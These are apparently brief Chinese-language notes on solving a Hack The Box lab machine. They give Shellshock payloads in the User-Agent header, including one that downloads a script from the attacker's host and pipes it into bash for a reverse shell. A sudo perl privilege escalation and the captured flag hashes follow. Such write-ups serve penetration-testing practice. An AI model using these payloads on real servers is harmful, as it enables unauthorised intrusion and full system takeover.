- IP : 10.129.213.104
- URL : https://app.hackthebox.eu/machines/108
Recon
- Rustscan
nmap- 
觀察首頁- 
通靈掃到目錄 /cgi-bin/user.sh-
Shell shock
- 在 User agent 增加
() { :;}; echo; /usr/bin/id 
User-Agent: () { :;}; echo; /usr/bin/wget 10.10.16.35:8000/s_HTB /tmp/s- 下載 shell
執行 shell- User-Agent: () { :;}; echo; /usr/bin/wget -O - 10.10.16.35:8000/s_HTB | /bin/bash
Reverse shell
- 收 shell
Spawn shell- python3 -c 'import pty; pty.spawn("/bin/bash")'Get user flag-
6e9aad0e2498bff702b570c2da380288
提權
- 跑豌豆
可以執行 perl- sudo perl -e 'exec "/bin/sh";'取得 Root Flag-
e3e05cbd925c9e407215bb26e9b7e47d